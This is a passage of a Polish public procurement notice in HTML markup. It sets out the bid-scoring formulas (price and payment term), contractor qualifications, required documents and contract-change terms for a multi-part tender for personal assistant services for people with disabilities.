<span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert dla każdej części zamówienia oddzielnie. Punkty za kryterium „Cena” zostaną<br/>obliczone według wzoru:<br/>C = Cn/Cb x 60 pkt gdzie, C – oznacza ilość punktów za kryterium cena,<br/>Cn – oznacza najniższą cenę ofertową spośród ofert nieodrzuconych,<br/>Cb – oznacza cenę oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu<br/>do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>Kryterium „Termin płatności” będzie liczony w dniach. Wykonawca w formularzu ofertowym w pkt C.1 lit. c) zaoferuje termin<br/>płatności, na jaki wyraża zgodę przy wykonywaniu usługi. Maksymalny termin płatności, jaki może zaoferować Wykonawca to 30 dni<br/>zaś minimalny to 7 dni od dnia prawidłowo złożonej faktury/rachunku.<br/>W przypadku zaoferowania maksymalnej długości terminu płatności tj. 30 dni, Wykonawca otrzyma czterdzieści (40) punktów,<br/>pozostali Wykonawcy będą oceniani wg następującego wzoru:<br/>T = To/Tmax. x 40 pkt gdzie,<br/>T – oznacza wartość punktową, którą należy wyznaczyć,<br/>To – oznacza termin płatności podany w badanej ofercie,<br/>Tmax. – oznacza najdłuższy oferowany termin płatności (maksymalnie 30 dni). Jeżeli Wykonawca zaoferuje termin płatności dłuższy<br/>niż 30 dni, Zamawiający do oceny oferty przyjmie termin 30 dni i w przypadku wyboru oferty Wykonawcy, do umowy zostanie<br/>wpisany termin 30 dni.<br/>Jeżeli Wykonawca zaoferuje termin krótszy niż 7 dni od dnia prawidłowo złożonej faktury/rachunku, Zamawiający odrzuci ofertę na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Jeżeli Wykonawca nie poda (nie wpisze) w formularzu ofertowym terminu płatności to<br/>Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Za najkorzystniejszą ofertę w zakresie<br/>każdej części zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru: O = C + T gdzie,<br/>O – oznacza łączną ilość punktów oferty ocenianej,<br/>C – oznacza liczbę punków uzyskanych w kryterium „Cena”,<br/>T – oznacza liczę punktów uzyskanych w kryterium „Termin płatności”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamawiający w trybie art. 121 i art. 60 ustawy Pzp zastrzega obowiązek osobistego wykonania kluczowych zadań wyszczególnionych w pkt 4.1.1. SWZ, w zakresie dotyczącym przedmiotu zamówienia. W ramach każdej z 5 części zostanie wybrana 1 osoba świadcząca usługę asystenta osoby niepełnosprawnej. 4.1.1. Opis przedmiotu zamówienia dla każdej z 5 części:<br/>Usługa asystenta osobistego osoby niepełnosprawnej ma na celu pomoc osobom niepełnosprawnym posiadającym orzeczenie o niepełnosprawności o stopniu znacznym lub o stopniu umiarkowanym albo traktowane na równi do wyżej wymienionych, zwanym „uczestnikami Programu”, w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym.<br/>Usługi asystencji osobistej mogą w szczególności polegać na pomocy asystenta w: 1) wykonywaniu czynności dnia codziennego dla uczestnika Programu; 2) wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsce; 3) załatwianiu spraw urzędowych; <br/> 4) korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy). Więcej informacji dot. przedmiotu zamówienia zawiera swz. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 34060,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert dla każdej części zamówienia oddzielnie. Punkty za kryterium „Cena” zostaną<br/>obliczone według wzoru:<br/>C = Cn/Cb x 60 pkt gdzie, C – oznacza ilość punktów za kryterium cena,<br/>Cn – oznacza najniższą cenę ofertową spośród ofert nieodrzuconych,<br/>Cb – oznacza cenę oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu<br/>do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>Kryterium „Termin płatności” będzie liczony w dniach. Wykonawca w formularzu ofertowym w pkt C.1 lit. c) zaoferuje termin<br/>płatności, na jaki wyraża zgodę przy wykonywaniu usługi. Maksymalny termin płatności, jaki może zaoferować Wykonawca to 30 dni<br/>zaś minimalny to 7 dni od dnia prawidłowo złożonej faktury/rachunku.<br/>W przypadku zaoferowania maksymalnej długości terminu płatności tj. 30 dni, Wykonawca otrzyma czterdzieści (40) punktów,<br/>pozostali Wykonawcy będą oceniani wg następującego wzoru:<br/>T = To/Tmax. x 40 pkt gdzie,<br/>T – oznacza wartość punktową, którą należy wyznaczyć,<br/>To – oznacza termin płatności podany w badanej ofercie,<br/>Tmax. – oznacza najdłuższy oferowany termin płatności (maksymalnie 30 dni). Jeżeli Wykonawca zaoferuje termin płatności dłuższy<br/>niż 30 dni, Zamawiający do oceny oferty przyjmie termin 30 dni i w przypadku wyboru oferty Wykonawcy, do umowy zostanie<br/>wpisany termin 30 dni.<br/>Jeżeli Wykonawca zaoferuje termin krótszy niż 7 dni od dnia prawidłowo złożonej faktury/rachunku, Zamawiający odrzuci ofertę na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Jeżeli Wykonawca nie poda (nie wpisze) w formularzu ofertowym terminu płatności to<br/>Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Za najkorzystniejszą ofertę w zakresie<br/>każdej części zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru: O = C + T gdzie,<br/>O – oznacza łączną ilość punktów oferty ocenianej,<br/>C – oznacza liczbę punków uzyskanych w kryterium „Cena”,<br/>T – oznacza liczę punktów uzyskanych w kryterium „Termin płatności”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamawiający w trybie art. 121 i art. 60 ustawy Pzp zastrzega obowiązek osobistego wykonania kluczowych zadań wyszczególnionych w pkt 4.1.1. SWZ, w zakresie dotyczącym przedmiotu zamówienia. W ramach każdej z 5 części zostanie wybrana 1 osoba świadcząca usługę asystenta osoby niepełnosprawnej. 4.1.1. Opis przedmiotu zamówienia dla każdej z 5 części: Usługa asystenta osobistego osoby niepełnosprawnej ma na celu pomoc osobom niepełnosprawnym posiadającym orzeczenie o niepełnosprawności o stopniu znacznym lub o stopniu umiarkowanym albo traktowane na równi do wyżej wymienionych, zwanym „uczestnikami Programu”, w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym. Usługi asystencji osobistej mogą w szczególności polegać na pomocy asystenta w: 1) wykonywaniu czynności dnia codziennego dla uczestnika Programu; 2) wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsce; 3) załatwianiu spraw urzędowych; 4) korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy). Więcej informacji dot. przedmiotu zamówienia zawiera swz. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 34060,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert dla każdej części zamówienia oddzielnie. Punkty za kryterium „Cena” zostaną<br/>obliczone według wzoru:<br/>C = Cn/Cb x 60 pkt gdzie, C – oznacza ilość punktów za kryterium cena,<br/>Cn – oznacza najniższą cenę ofertową spośród ofert nieodrzuconych,<br/>Cb – oznacza cenę oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu<br/>do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>Kryterium „Termin płatności” będzie liczony w dniach. Wykonawca w formularzu ofertowym w pkt C.1 lit. c) zaoferuje termin<br/>płatności, na jaki wyraża zgodę przy wykonywaniu usługi. Maksymalny termin płatności, jaki może zaoferować Wykonawca to 30 dni<br/>zaś minimalny to 7 dni od dnia prawidłowo złożonej faktury/rachunku.<br/>W przypadku zaoferowania maksymalnej długości terminu płatności tj. 30 dni, Wykonawca otrzyma czterdzieści (40) punktów,<br/>pozostali Wykonawcy będą oceniani wg następującego wzoru:<br/>T = To/Tmax. x 40 pkt gdzie,<br/>T – oznacza wartość punktową, którą należy wyznaczyć,<br/>To – oznacza termin płatności podany w badanej ofercie,<br/>Tmax. – oznacza najdłuższy oferowany termin płatności (maksymalnie 30 dni). Jeżeli Wykonawca zaoferuje termin płatności dłuższy<br/>niż 30 dni, Zamawiający do oceny oferty przyjmie termin 30 dni i w przypadku wyboru oferty Wykonawcy, do umowy zostanie<br/>wpisany termin 30 dni.<br/>Jeżeli Wykonawca zaoferuje termin krótszy niż 7 dni od dnia prawidłowo złożonej faktury/rachunku, Zamawiający odrzuci ofertę na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Jeżeli Wykonawca nie poda (nie wpisze) w formularzu ofertowym terminu płatności to<br/>Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Za najkorzystniejszą ofertę w zakresie<br/>każdej części zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru: O = C + T gdzie,<br/>O – oznacza łączną ilość punktów oferty ocenianej,<br/>C – oznacza liczbę punków uzyskanych w kryterium „Cena”,<br/>T – oznacza liczę punktów uzyskanych w kryterium „Termin płatności”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamawiający w trybie art. 121 i art. 60 ustawy Pzp zastrzega obowiązek osobistego wykonania kluczowych zadań wyszczególnionych w pkt 4.1.1. SWZ, w zakresie dotyczącym przedmiotu zamówienia. W ramach każdej z 5 części zostanie wybrana 1 osoba świadcząca usługę asystenta osoby niepełnosprawnej. 4.1.1. Opis przedmiotu zamówienia dla każdej z 5 części:<br/>Usługa asystenta osobistego osoby niepełnosprawnej ma na celu pomoc osobom niepełnosprawnym posiadającym orzeczenie o niepełnosprawności o stopniu znacznym lub o stopniu umiarkowanym albo traktowane na równi do wyżej wymienionych, zwanym „uczestnikami Programu”, w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym.<br/>Usługi asystencji osobistej mogą w szczególności polegać na pomocy asystenta w: 1) wykonywaniu czynności dnia codziennego dla uczestnika Programu; 2) wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsce; 3) załatwianiu spraw urzędowych; <br/> 4) korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy). Więcej informacji dot. przedmiotu zamówienia zawiera swz. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 34060,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert dla każdej części zamówienia oddzielnie. Punkty za kryterium „Cena” zostaną<br/>obliczone według wzoru:<br/>C = Cn/Cb x 60 pkt gdzie, C – oznacza ilość punktów za kryterium cena,<br/>Cn – oznacza najniższą cenę ofertową spośród ofert nieodrzuconych,<br/>Cb – oznacza cenę oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu<br/>do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>Kryterium „Termin płatności” będzie liczony w dniach. Wykonawca w formularzu ofertowym w pkt C.1 lit. c) zaoferuje termin<br/>płatności, na jaki wyraża zgodę przy wykonywaniu usługi. Maksymalny termin płatności, jaki może zaoferować Wykonawca to 30 dni<br/>zaś minimalny to 7 dni od dnia prawidłowo złożonej faktury/rachunku.<br/>W przypadku zaoferowania maksymalnej długości terminu płatności tj. 30 dni, Wykonawca otrzyma czterdzieści (40) punktów,<br/>pozostali Wykonawcy będą oceniani wg następującego wzoru:<br/>T = To/Tmax. x 40 pkt gdzie,<br/>T – oznacza wartość punktową, którą należy wyznaczyć,<br/>To – oznacza termin płatności podany w badanej ofercie,<br/>Tmax. – oznacza najdłuższy oferowany termin płatności (maksymalnie 30 dni). Jeżeli Wykonawca zaoferuje termin płatności dłuższy<br/>niż 30 dni, Zamawiający do oceny oferty przyjmie termin 30 dni i w przypadku wyboru oferty Wykonawcy, do umowy zostanie<br/>wpisany termin 30 dni.<br/>Jeżeli Wykonawca zaoferuje termin krótszy niż 7 dni od dnia prawidłowo złożonej faktury/rachunku, Zamawiający odrzuci ofertę na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Jeżeli Wykonawca nie poda (nie wpisze) w formularzu ofertowym terminu płatności to<br/>Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Za najkorzystniejszą ofertę w zakresie<br/>każdej części zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru: O = C + T gdzie,<br/>O – oznacza łączną ilość punktów oferty ocenianej,<br/>C – oznacza liczbę punków uzyskanych w kryterium „Cena”,<br/>T – oznacza liczę punktów uzyskanych w kryterium „Termin płatności”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczący zdolności technicznej i zawodowej, dotyczy każdej z 5 części: Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w okresie wykonywania zamówienia i skieruje do jego realizacji: a) osobę posiadającą dokument potwierdzający uzyskanie kwalifikacji w następujących kierunkach: asystent osoby niepełnosprawnej, opiekun osoby starszej, opiekun medyczny, pedagog, psycholog, terapeuta zajęciowy, pielęgniarka, fizjoterapeuta (potwierdzone kopią dyplomu/ świadectwa lub innego właściwego dokumentu); lub b) osobę posiadającą co najmniej 6-miesięczne, udokumentowane doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym np. doświadczenie zawodowe, udzielanie wsparcia osobom niepełnosprawnym w formie wolontariatu (udokumentowane zaświadczeniem od pracodawcy, kopią świadectwa pracy lub innym dokumentem, z którego wynika charakter i okres zatrudnienia). Wykonawca w celu wykazania spełniania warunków<br/>określonych w pkt 6.1.4. SWZ i powyżej w ogłoszeniu może wskazać osobę będącą obywatelem państwa członkowskiego UE, która nabyła kwalifikacje zawodowe równoznaczne wymaganym w zamówieniu zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220). W odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający poza oświadczeniem o braku podstaw do wykluczenia – zał. Nr 4 do SWZ (składanym wraz z ofertą), nie wymaga składania podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia z udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; sporządzonego zgodnie z załącznikiem nr 7 do SWZ – w odniesieniu do<br/>warunku określonego powyżej w ogłoszeniu i w pkt 6.1.4. SWZ. Dokumenty te powinny być aktualne na dzień ich złożenia. Wykonawca składa podmiotowe środki dowodowe na wezwanie Zamawiającego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) formularz ofertowy – do wykorzystania wzór (druk), stanowiący załącznik nr 3 do SWZ (przy czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach); 2) oświadczenia, o których mowa w pkt 8.1. SWZ;<br/>3) oświadczenie, o którym mowa w pkt 8.2. SWZ (jeżeli dotyczy);<br/>4) zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4. SWZ (jeżeli dotyczy); 5)potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby: a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, żąda<br/>złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów, c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w lit a, Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. 6) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). 13.5. Pełnomocnictwo, o którym mowa w pkt 13.4 pkt 5 lit c i pkt 6 składa się, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>lub w formie elektronicznej kopii poświadczonej za zgodność notarialnie – w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r., poz. 346 – z późn. zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 1) oświadczenia, o których mowa w pkt 8.1. SWZ, składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji; 2) w przypadku, o którym mowa w pkt 6.3. SWZ,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym; 3) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt 8.3. SWZ,<br/>przy czym podmiotowe środki dowodowe, o których mowa w pkt 8.3.1. SWZ, składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są wyznaczyć, który z Wykonawców będzie pełnił funkcję lidera w kontaktach z Zamawiającym. W tym celu do oferty załączyć należy pełnomocnictwo na zasadach określonych w pkt 13.4. ppkt 6 SWZ i pkt 13.5. SWZ. 10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana warunków umowy może być dokonana w formie pisemnej pod rygorem nieważności. 2. Zamawiający dopuszcza zmianę Umowy w zakresie przedmiotu umowy, sposobu realizacji umowy, terminu i warunków płatności w przypadkach:   1) zmniejszenia zakresu rzeczowego przedmiotu umowy, jeżeli w trakcie realizacji 